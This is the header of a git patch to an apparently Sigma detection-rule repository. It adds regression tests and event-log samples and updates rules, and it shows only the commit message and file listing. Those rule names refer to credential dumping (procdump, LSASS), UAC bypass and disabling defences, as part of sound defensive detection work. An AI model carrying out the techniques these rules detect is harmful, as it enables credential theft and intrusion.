From 2cb7375c6b1d8035bf773ef29d065793b645eb37 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali
Date: Tue, 25 Nov 2025 16:00:53 +0100
Subject: [PATCH] Merge PR #5719 from @nasbench - Add regression test CI, data and simulation links

update: Cred Dump Tools Dropped Files - Add procdump.exe and procdump64a.exe
update: File Download From Browser Process Via Inline URL - Enhance selection by splitting CLI markers for better matching
update: Tor Client/Browser Execution - Add additional PE metadata markers
update: System Information Discovery via Registry Queries - Enhance registry markers
update: PUA - AdFind Suspicious Execution - Add -sc to dclist string for more accurate coverage.
fix: Removal Of Index Value to Hide Schedule Task - Registry - Remove EventType condition that broke the rule.
fix: Removal Of SD Value to Hide Schedule Task - Registry - Remove EventType condition that broke the rule.
fix: Creation of a Local Hidden User Account by Registry - Fix the TargetObject value
fix: Potential Persistence Via New AMSI Providers - Registry - Change logsource and fix the rule logic
fix: Potential COM Object Hijacking Via TreatAs Subkey - Registry - Change logsource and fix the rule logic
fix: Potential Persistence Via Logon Scripts - Registry - Fix incorrect logsource
fix: PUA - Sysinternal Tool Execution - Registry - Fix incorrect logsource
fix: Suspicious Execution Of Renamed Sysinternals Tools - Registry - Fix incorrect logsource
fix: PUA - Sysinternals Tools Execution - Registry - Fix incorrect logsource
chore: add CI script for regression
chore: add regression data

---------

Co-authored-by: swachchhanda000 <87493836+swachchhanda000@users.noreply.github.com>
Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com>
---
 .github/workflows/known-FPs.csv | 2 +
 .github/workflows/regression-tests.yml | 31 +
 .../fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx | Bin 0 -> 69632 bytes
 .../fed85bf9-e075-4280-9159-fbe8a023d6fa.json | 51 ++
 .../info.yml | 13 +
 .../0b9ad457-2554-44c1-82c2-d56a99c42377.evtx | Bin 0 -> 69632 bytes
 .../0b9ad457-2554-44c1-82c2-d56a99c42377.json | 255 ++++++++
 .../file_event_win_anydesk_artefact/info.yml | 13 +
 .../65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx | Bin 0 -> 69632 bytes
 .../65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json | 51 ++
 .../info.yml | 13 +
 .../df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx | Bin 0 -> 69632 bytes
 .../df6ecb8b-7822-4f4b-b412-08f524b4576c.json | 51 ++
 .../info.yml | 13 +
 .../ee63c85c-6d51-4d12-ad09-04e25877a947.evtx | Bin 0 -> 69632 bytes
 .../ee63c85c-6d51-4d12-ad09-04e25877a947.json | 51 ++
 .../info.yml | 13 +
 .../13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx | Bin 0 -> 69632 bytes
 .../13c02350-4177-4e45-ac17-cf7ca628ff5e.json | 51 ++
 .../info.yml | 13 +
 .../d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx | Bin 0 -> 69632 bytes
 .../d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json | 51 ++
 .../info.yml | 13 +
 .../8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx | Bin 0 -> 69632 bytes
 .../8fbf3271-1ef6-4e94-8210-03c2317947f6.json | 306 ++++++++++
 .../info.yml | 13 +
 .../aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx | Bin 0 -> 69632 bytes
 .../aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json | 51 ++
 .../info.yml | 13 +
 .../3215aa19-f060-4332-86d5-5602511f3ca8.evtx | Bin 0 -> 69632 bytes
 .../3215aa19-f060-4332-86d5-5602511f3ca8.json | 51 ++
 .../info.yml | 13 +
 .../b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx | Bin 0 -> 69632 bytes
 .../b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json | 51 ++
 .../info.yml | 13 +
 .../cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx | Bin 0 -> 69632 bytes
 .../cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json | 51 ++
 .../info.yml | 13 +
 .../69ca12af-119d-44ed-b50f-a47af0ebc364.evtx | Bin 0 -> 69632 bytes
 .../69ca12af-119d-44ed-b50f-a47af0ebc364.json | 51 ++
 .../info.yml | 13 +
 .../0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx | Bin 0 -> 69632 bytes
 .../0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json | 66 ++
 .../info.yml | 12 +
 .../88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx | Bin 0 -> 69632 bytes
 .../88d6e60c-759d-4ac1-a447-c0f1466c2d21.json | 66 ++
 .../info.yml | 12 +
 .../1c526788-0abe-4713-862f-b520da5e5316.evtx | Bin 0 -> 69632 bytes
 .../1c526788-0abe-4713-862f-b520da5e5316.json | 66 ++
 .../info.yml | 12 +
 .../27ba3207-dd30-4812-abbf-5d20c57d474e.evtx | Bin 0 -> 69632 bytes
 .../27ba3207-dd30-4812-abbf-5d20c57d474e.json | 66 ++
 .../info.yml | 12 +
 .../94771a71-ba41-4b6e-a757-b531372eaab6.evtx | Bin 0 -> 69632 bytes
 .../94771a71-ba41-4b6e-a757-b531372eaab6.json | 66 ++
 .../info.yml | 12 +
 .../62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx | Bin 0 -> 69632 bytes
 .../62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json | 66 ++
 .../info.yml | 12 +
 .../d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx | Bin 0 -> 69632 bytes
 .../d2125259-ddea-4c1c-9c22-977eb5b29cf0.json | 66 ++
 .../info.yml | 13 +
 .../cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx | Bin 0 -> 69632 bytes
 .../cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json | 66 ++
 .../info.yml | 13 +
 .../19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx | Bin 0 -> 69632 bytes
 .../19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json | 66 ++
 .../info.yml | 13 +
 .../13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx | Bin 0 -> 69632 bytes
 .../13e6fe51-d478-4c7e-b0f2-6da9b400a829.json | 66 ++
 .../info.yml | 13 +
 .../42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx | Bin 0 -> 69632 bytes
 .../42a5f1e7-9603-4f6d-97ae-3f37d130d794.json | 66 ++
 .../info.yml | 13 +
 .../e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx | Bin 0 -> 69632 bytes
 .../e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json | 66 ++
 .../info.yml | 13 +
 .../ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx | Bin 0 -> 69632 bytes
 .../ea0cdc3e-2239-4f26-a947-4e8f8224e464.json | 66 ++
 .../info.yml | 13 +
 .../82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx | Bin 0 -> 69632 bytes
 .../82a6714f-4899-4f16-9c1e-9a333544d4c3.json | 66 ++
 .../info.yml | 13 +
 .../3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx | Bin 0 -> 69632 bytes
 .../3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json | 66 ++
 .../info.yml | 13 +
 .../6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx | Bin 0 -> 69632 bytes
 .../6c6d9280-e6d0-4b9d-80ac-254701b64916.json | 66 ++
 .../info.yml | 13 +
 .../7090adee-82e2-4269-bd59-80691e7c6338.evtx | Bin 0 -> 69632 bytes
 .../7090adee-82e2-4269-bd59-80691e7c6338.json | 66 ++
 .../info.yml | 13 +
 .../c7942406-33dd-4377-a564-0f62db0593a3.evtx | Bin 0 -> 69632 bytes
 .../c7942406-33dd-4377-a564-0f62db0593a3.json | 66 ++
 .../info.yml | 13 +
 .../4b046706-5789-4673-b111-66f25fe99534.evtx | Bin 0 -> 69632 bytes
 .../4b046706-5789-4673-b111-66f25fe99534.json | 66 ++
 .../info.yml | 13 +
 .../ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx | Bin 0 -> 69632 bytes
 .../ddeff553-5233-4ae9-bbab-d64d2bd634be.json | 66 ++
 .../proc_creation_win_clip_execution/info.yml | 13 +
 .../3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx | Bin 0 -> 69632 bytes
 .../3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json | 66 ++
 .../info.yml | 13 +
 .../7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx | Bin 0 -> 69632 bytes
 .../7c9340a9-e2ee-4e43-94c5-c54ebbea1006.json | 66 ++
 .../info.yml | 13 +
 .../e9b61244-893f-427c-b287-3e708f321c6b.evtx | Bin 0 -> 69632 bytes
 .../e9b61244-893f-427c-b287-3e708f321c6b.json | 66 ++
 .../info.yml | 13 +
 .../41ca393d-538c-408a-ac27-cf1e038be80c.evtx | Bin 0 -> 69632 bytes
 .../41ca393d-538c-408a-ac27-cf1e038be80c.json | 66 ++
 .../info.yml | 13 +
 .../b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx | Bin 0 -> 69632 bytes
 .../b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.json | 66 ++
 .../info.yml | 13 +
 .../07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx | Bin 0 -> 69632 bytes
 .../07f8bdc2-c9b3-472a-9817-5a670b872f53.json | 66 ++
 .../proc_creation_win_cmdkey_recon/info.yml | 13 +
 .../056c7317-9a09-4bd4-9067-d051312752ea.evtx | Bin 0 -> 69632 bytes
 .../056c7317-9a09-4bd4-9067-d051312752ea.json | 66 ++
 .../info.yml | 13 +
 .../e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx | Bin 0 -> 69632 bytes
 .../e218595b-bbe7-4ee5-8a96-f32a24ad3468.json | 66 ++
 .../info.yml | 13 +
 .../b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx | Bin 0 -> 69632 bytes
 .../b4dc61f5-6cce-468e-a608-b48b469feaa2.json | 66 ++
 .../info.yml | 13 +
 .../0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx | Bin 0 -> 69632 bytes
 .../0022869c-49f7-4ff2-ba03-85ac42ddac58.json | 66 ++
 .../info.yml | 13 +
 .../43e32da2-fdd0-4156-90de-50dfd62636f9.evtx | Bin 0 -> 69632 bytes
 .../43e32da2-fdd0-4156-90de-50dfd62636f9.json | 66 ++
 .../proc_creation_win_dism_remove/info.yml | 13 +
 .../9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx | Bin 0 -> 69632 bytes
 .../9fc3072c-dc8f-4bf7-b231-18950000fadd.json | 66 ++
 .../info.yml | 12 +
 .../a20def93-0709-4eae-9bd2-31206e21e6b2.evtx | Bin 0 -> 69632 bytes
 .../a20def93-0709-4eae-9bd2-31206e21e6b2.json | 66 ++
 .../info.yml | 12 +
 .../3bad990e-4848-4a78-9530-b427d854aac0.evtx | Bin 0 -> 69632 bytes
 .../3bad990e-4848-4a78-9530-b427d854aac0.json | 66 ++
 .../info.yml | 13 +
 .../7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx | Bin 0 -> 69632 bytes
 .../7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json | 132 ++++
 .../info.yml | 12 +
 .../c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx | Bin 0 -> 69632 bytes
 .../c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json | 66 ++
 .../info.yml | 12 +
 .../91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx | Bin 0 -> 69632 bytes
 .../91a2c315-9ee6-4052-a853-6f6a8238f90d.json | 66 ++
 .../info.yml | 13 +
 .../fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx | Bin 0 -> 69632 bytes
 .../fe63010f-8823-4864-a96b-a7b4a0f7b929.json | 66 ++
 .../proc_creation_win_findstr_lsass/info.yml | 13 +
 .../47e4bab7-c626-47dc-967b-255608c9a920.evtx | Bin 0 -> 69632 bytes
 .../47e4bab7-c626-47dc-967b-255608c9a920.json | 198 ++++++
 .../info.yml | 13 +
 .../ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx | Bin 0 -> 69632 bytes
 .../ccb5742c-c248-4982-8c5c-5571b9275ad3.json | 66 ++
 .../info.yml | 13 +
 .../4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx | Bin 0 -> 69632 bytes
 .../4fe074b4-b833-4081-8f24-7dcfeca72b42.json | 198 ++++++
 .../info.yml | 13 +
 .../af491bca-e752-4b44-9c86-df5680533dbc.evtx | Bin 0 -> 69632 bytes
 .../af491bca-e752-4b44-9c86-df5680533dbc.json | 66 ++
 .../info.yml | 13 +
 .../e56d3073-83ff-4021-90fe-c658e0709e72.evtx | Bin 0 -> 69632 bytes
 .../e56d3073-83ff-4021-90fe-c658e0709e72.json | 66 ++
 .../info.yml | 12 +
 .../68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx | Bin 0 -> 69632 bytes
 .../68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json | 66 ++
 .../info.yml | 12 +
 .../455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx | Bin 0 -> 69632 bytes
 .../455b9d50-15a1-4b99-853f-8d37655a4c1b.json | 66 ++
 .../info.yml | 13 +
 .../514e7e3e-b3b4-4a67-af60-be20f139198b.evtx | Bin 0 -> 69632 bytes
 .../514e7e3e-b3b4-4a67-af60-be20f139198b.json | 66 ++
 .../info.yml | 13 +
 .../9a132afa-654e-11eb-ae93-0242ac130002.evtx | Bin 0 -> 69632 bytes
 .../9a132afa-654e-11eb-ae93-0242ac130002.json | 66 ++
 .../info.yml | 13 +
 .../bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx | Bin 0 -> 69632 bytes
 .../bef37fa2-f205-4a7b-b484-0759bfd5f86f.json | 66 ++
 .../info.yml | 13 +
 .../54773c5f-f1cc-4703-9126-2f797d96a69d.evtx | Bin 0 -> 69632 bytes
 .../54773c5f-f1cc-4703-9126-2f797d96a69d.json | 66 ++
 .../info.yml | 13 +
 .../d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx | Bin 0 -> 69632 bytes
 .../d2b749ee-4225-417e-b20e-a8d2193cbb84.json | 66 ++
 .../info.yml | 13 +
 .../fa00b701-44c6-4679-994d-5a18afa8a707.evtx | Bin 0 -> 69632 bytes
 .../fa00b701-44c6-4679-994d-5a18afa8a707.json | 66 ++
 .../info.yml | 13 +
 .../de587dce-915e-4218-aac4-835ca6af6f70.evtx | Bin 0 -> 69632 bytes
 .../de587dce-915e-4218-aac4-835ca6af6f70.json | 66 ++
 .../info.yml | 13 +
 .../d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx | Bin 0 -> 69632 bytes
 .../d7662ff6-9e97-4596-a61d-9839e32dee8d.json | 66 ++
 .../info.yml | 13 +
 .../9ec9fb1b-e059-4489-9642-f270c207923d.evtx | Bin 0 -> 69632 bytes
 .../9ec9fb1b-e059-4489-9642-f270c207923d.json | 66 ++
 .../info.yml | 13 +
 .../df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx | Bin 0 -> 69632 bytes
 .../df55196f-f105-44d3-a675-e9dfb6cc2f2b.json | 66 ++
 .../proc_creation_win_renamed_adfind/info.yml | 13 +
 .../36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx | Bin 0 -> 69632 bytes
 .../36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json | 66 ++
 .../proc_creation_win_renamed_binary/info.yml | 13 +
 .../0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx | Bin 0 -> 69632 bytes
 .../0ba1da6d-b6ce-4366-828c-18826c9de23e.json | 66 ++
 .../info.yml | 13 +
 .../7530cd3d-7671-43e3-b209-976966f6ea48.evtx | Bin 0 -> 69632 bytes
 .../7530cd3d-7671-43e3-b209-976966f6ea48.json | 66 ++
 .../proc_creation_win_renamed_curl/info.yml | 13 +
 .../277a4393-446c-449a-b0ed-7fdc7795244c.evtx | Bin 0 -> 69632 bytes
 .../277a4393-446c-449a-b0ed-7fdc7795244c.json | 66 ++
 .../proc_creation_win_renamed_ftp/info.yml | 13 +
 .../bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx | Bin 0 -> 69632 bytes
 .../bd1c6866-65fc-44b2-be51-5588fcff82b9.json | 66 ++
 .../proc_creation_win_renamed_msdt/info.yml | 13 +
 .../81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx | Bin 0 -> 69632 bytes
 .../81bcb81b-5b1f-474b-b373-52c871aaa7b1.json | 66 ++
 ...bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls | 66 ++
 .../info.yml | 13 +
 .../41d1058a-aea7-4952-9293-29eaaf516465.evtx | Bin 0 -> 69632 bytes
 .../41d1058a-aea7-4952-9293-29eaaf516465.json | 51 ++
 .../info.yml | 13 +
 .../3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx | Bin 0 -> 69632 bytes
 .../3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json | 51 ++
 .../registry_delete_runmru/info.yml | 13 +
 .../526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx | Bin 0 -> 69632 bytes
 .../526cc8bc-1cdc-48ad-8b26-f19bff969cec.json | 51 ++
 .../info.yml | 13 +
 .../acd74772-5f88-45c7-956b-6a7b36c294d2.evtx | Bin 0 -> 69632 bytes
 .../acd74772-5f88-45c7-956b-6a7b36c294d2.json | 51 ++
 .../info.yml | 13 +
 .../460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx | Bin 0 -> 69632 bytes
 .../460479f3-80b7-42da-9c43-2cc1d54dbccd.json | 51 ++
 .../info.yml | 13 +
 .../1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx | Bin 0 -> 69632 bytes
 .../1547e27c-3974-43e2-a7d7-7f484fb928ec.json | 52 ++
 .../info.yml | 13 +
 .../944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx | Bin 0 -> 69632 bytes
 .../944e8941-f6f6-4ee8-ac05-1c224e923c0e.json | 52 ++
 .../registry_set_add_port_monitor/info.yml | 13 +
 .../37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx | Bin 0 -> 69632 bytes
 .../37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json | 52 ++
 .../info.yml | 13 +
 .../46dd5308-4572-4d12-aa43-8938f0184d4f.evtx | Bin 0 -> 69632 bytes
 .../46dd5308-4572-4d12-aa43-8938f0184d4f.json | 52 ++
 .../info.yml | 13 +
 .../674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx | Bin 0 -> 69632 bytes
 .../674202d0-b22a-4af4-ae5f-2eda1f3da1af.json | 52 ++
 .../info.yml | 13 +
 .../724ea201-6514-4f38-9739-e5973c34f49a.evtx | Bin 0 -> 69632 bytes
 .../724ea201-6514-4f38-9739-e5973c34f49a.json | 52 ++
 .../info.yml | 13 +
 .../509e84b9-a71a-40e0-834f-05470369bd1e.evtx | Bin 0 -> 69632 bytes
 .../509e84b9-a71a-40e0-834f-05470369bd1e.json | 52 ++
 .../registry_set_change_rdp_port/info.yml | 13 +
 .../45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx | Bin 0 -> 69632 bytes
 .../45e112d0-7759-4c2a-aa36-9f8fb79d3393.json | 156 +++++
 .../info.yml | 13 +
 .../8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx | Bin 0 -> 69632 bytes
 .../8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json | 52 ++
 .../info.yml | 13 +
 .../c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx | Bin 0 -> 69632 bytes
 .../c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json | 104 ++++
 .../info.yml | 13 +
 .../974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx | Bin 0 -> 69632 bytes
 .../974515da-6cc5-4c95-ae65-f97f9150ec7f.json | 52 ++
 .../info.yml | 13 +
 .../3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx | Bin 0 -> 69632 bytes
 .../3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json | 52 ++
 .../info.yml | 13 +
 .../33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx | Bin 0 -> 69632 bytes
 .../33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json | 52 ++
 .../info.yml | 13 +
 .../9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx | Bin 0 -> 69632 bytes
 .../9b0f8a61-91b2-464f-aceb-0527e0a45020.json | 52 ++
 .../info.yml | 13 +
 .../9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx | Bin 0 -> 69632 bytes
 .../9ace0707-b560-49b8-b6ca-5148b42f39fb.json | 52 ++
 .../info.yml | 13 +
 .../fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx | Bin 0 -> 69632 bytes
 .../fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json | 52 ++
 .../info.yml | 13 +
 .../25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx | Bin 0 -> 69632 bytes
 .../25ffa65d-76d8-4da5-a832-3f2b0136e133.json | 52 ++
 .../info.yml | 13 +
 .../f50f3c09-557d-492d-81db-9064a8d4e211.evtx | Bin 0 -> 69632 bytes
 .../f50f3c09-557d-492d-81db-9064a8d4e211.json | 52 ++
 .../info.yml | 13 +
 .../c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx | Bin 0 -> 69632 bytes
 .../c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json | 52 ++
 .../info.yml | 13 +
 .../f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx | Bin 0 -> 69632 bytes
 .../f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json | 52 ++
 .../registry_set_special_accounts/info.yml | 13 +
 .../8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx | Bin 0 -> 69632 bytes
 .../8ac03a65-6c84-4116-acad-dc1558ff7a77.json | 46 ++
 .../sysmon_config_modification/info.yml | 13 +
 .../auditd/lnx_auditd_binary_padding.yml | 5 +
 .../lnx_auditd_change_file_time_attr.yml | 13 +
 .../lnx_auditd_chattr_immutable_removal.yml | 5 +
 .../file_event_win_advanced_ip_scanner.yml | 1 +
 .../file_event_win_anydesk_artefact.yml | 1 +
 ...t_win_create_evtx_non_common_locations.yml | 1 +
 ...ile_event_win_create_non_existent_dlls.yml | 1 +
 ...e_event_win_creation_new_shim_database.yml | 1 +
 ...le_event_win_creation_system_dll_files.yml | 1 +
 .../file_event_win_creation_system_file.yml | 1 +
 ...vent_win_cred_dump_tools_dropped_files.yml | 5 +-
 ...file_event_win_dump_file_susp_creation.yml | 1 +
 ...le_event_win_susp_lnk_double_extension.yml | 1 +
 ...event_win_susp_public_folder_extension.yml | 1 +
 ...e_event_win_susp_recycle_bin_fake_exec.yml | 1 +
 .../file_event_win_taskmgr_lsass_dump.yml | 1 +
 ..._creation_win_at_interactive_execution.yml | 5 +
 ..._creation_win_bcdedit_boot_conf_tamper.yml | 5 +
 ...owsers_chromium_headless_file_download.yml | 1 +
 ...n_win_browsers_chromium_load_extension.yml | 1 +
 ...on_win_browsers_chromium_mockbin_abuse.yml | 1 +
 ..._browsers_chromium_susp_load_extension.yml | 1 +
 ...tion_win_browsers_inline_file_download.yml | 38 +-
 ...oc_creation_win_browsers_tor_execution.yml | 11 +-
 ..._win_certutil_certificate_installation.yml | 1 +
 .../proc_creation_win_certutil_decode.yml | 1 +
 .../proc_creation_win_certutil_download.yml | 1 +
 ...eation_win_certutil_download_direct_ip.yml | 1 +
 ...certutil_download_file_sharing_domains.yml | 1 +
 .../proc_creation_win_certutil_encode.yml | 1 +
 ...on_win_certutil_encode_susp_extensions.yml | 1 +
 ...tion_win_certutil_encode_susp_location.yml | 1 +
 .../proc_creation_win_certutil_export_pfx.yml | 1 +
 ...oc_creation_win_certutil_ntlm_coercion.yml | 1 +
 ...proc_creation_win_chcp_codepage_lookup.yml | 1 +
 ...proc_creation_win_chcp_codepage_switch.yml | 1 +
 ...tion_win_cipher_overwrite_deleted_data.yml | 6 +
 .../proc_creation_win_clip_execution.yml | 6 +
 .../proc_creation_win_cmd_assoc_execution.yml | 1 +
 .../proc_creation_win_cmd_dir_execution.yml | 6 +
 .../proc_creation_win_cmd_mklink_osk_cmd.yml | 1 +
 .../proc_creation_win_cmd_rmdir_execution.yml | 1 +
 ...eation_win_cmdkey_adding_generic_creds.yml | 6 +
 .../proc_creation_win_cmdkey_recon.yml | 6 +
 ...eation_win_conhost_headless_powershell.yml | 1 +
 .../proc_creation_win_curl_susp_download.yml | 6 +
 .../proc_creation_win_dirlister_execution.yml | 8 +-
 ...creation_win_discovery_via_reg_queries.yml | 21 +-
 .../proc_creation_win_dism_remove.yml | 6 +
 .../proc_creation_win_driverquery_recon.yml | 1 +
 .../proc_creation_win_driverquery_usage.yml | 1 +
 ...ion_win_dsquery_domain_trust_discovery.yml | 6 +
 .../proc_creation_win_dtrace_kernel_dump.yml | 1 +
 ...lorer_folder_shortcut_via_shell_binary.yml | 1 +
 ...roc_creation_win_findstr_gpp_passwords.yml | 6 +
 .../proc_creation_win_findstr_lsass.yml | 1 +
 ...oc_creation_win_findstr_recon_everyone.yml | 1 +
 ...creation_win_findstr_recon_pipe_output.yml | 1 +
 ...on_win_findstr_security_keyword_lookup.yml | 6 +
 .../proc_creation_win_finger_execution.yml | 1 +
 .../proc_creation_win_gpresult_execution.yml | 6 +
 .../proc_creation_win_hh_chm_execution.yml | 1 +
 ...oc_creation_win_pua_adfind_enumeration.yml | 1 +
 ...proc_creation_win_pua_adfind_execution.yml | 1 +
 ...roc_creation_win_pua_adfind_susp_usage.yml | 14 +-
 ...c_creation_win_pua_advanced_ip_scanner.yml | 1 +
 ...creation_win_pua_advanced_port_scanner.yml | 1 +
 .../proc_creation_win_pua_advancedrun.yml | 1 +
 ...creation_win_pua_advancedrun_priv_user.yml | 1 +
 .../proc_creation_win_reg_add_run_key.yml | 1 +
 .../proc_creation_win_reg_add_safeboot.yml | 1 +
 ...in_registry_special_accounts_hide_user.yml | 1 +
 .../proc_creation_win_renamed_adfind.yml | 1 +
 .../proc_creation_win_renamed_binary.yml | 1 +
 ...ion_win_renamed_binary_highly_relevant.yml | 1 +
 .../proc_creation_win_renamed_curl.yml | 1 +
 .../proc_creation_win_renamed_ftp.yml | 1 +
 .../proc_creation_win_renamed_msdt.yml | 1 +
 .../proc_creation_win_sc_stop_service.yml | 1 +
 ...egistry_add_persistence_amsi_providers.yml | 30 -
 ...persistence_disk_cleanup_handler_entry.yml | 4 +-
 ...istry_delete_removal_amsi_registry_key.yml | 6 +
 .../registry_delete_runmru.yml | 1 +
 ...asks_hide_task_via_index_value_removal.yml | 4 +-
 ...chtasks_hide_task_via_sd_value_removal.yml | 4 +-
 .../registry_event_add_local_hidden_user.yml | 10 +-
 ...stry_set_add_load_service_in_safe_mode.yml | 10 +
 .../registry_set_add_port_monitor.yml | 6 +
 ...et_allow_rdp_remote_assistance_feature.yml | 6 +
 ...y_set_bypass_uac_using_delegateexecute.yml | 6 +
 ...istry_set_bypass_uac_using_eventviewer.yml | 6 +
 ...et_bypass_uac_using_silentcleanup_task.yml | 6 +
 .../registry_set_change_rdp_port.yml | 12 +-
 .../registry_set_change_security_zones.yml | 6 +
 ...pervisorenforcedcodeintegrity_disabled.yml | 8 +-
 ...istry_set_disable_administrative_share.yml | 6 +
 ...registry_set_disable_defender_firewall.yml | 6 +
 ..._disable_security_center_notifications.yml | 6 +
 ...egistry_set_persistence_amsi_providers.yml | 41 ++
 ...istry_set_persistence_com_key_linking.yml} | 15 +-
 ..._logon_scripts_userinitmprlogonscript.yml} | 11 +-
 ...gistry_set_powershell_logging_disabled.yml | 8 +
 ...t_pua_sysinternals_execution_via_eula.yml} | 6 +-
 ...sinternals_renamed_execution_via_eula.yml} | 6 +-
 ..._sysinternals_susp_execution_via_eula.yml} | 6 +-
 .../registry_set_special_accounts.yml | 8 +-
 .../sysmon/sysmon_config_modification.yml | 1 +
 tests/regression_tests_runner.py | 566 ++++++++++++++++++
 tests/thor.yml | 11 +-
 412 files changed, 9353 insertions(+), 84 deletions(-)
 create mode 100644 .github/workflows/regression-tests.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx
 create mode 100644 regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json
 create mode 100644 regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml
 create mode 100644 regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx
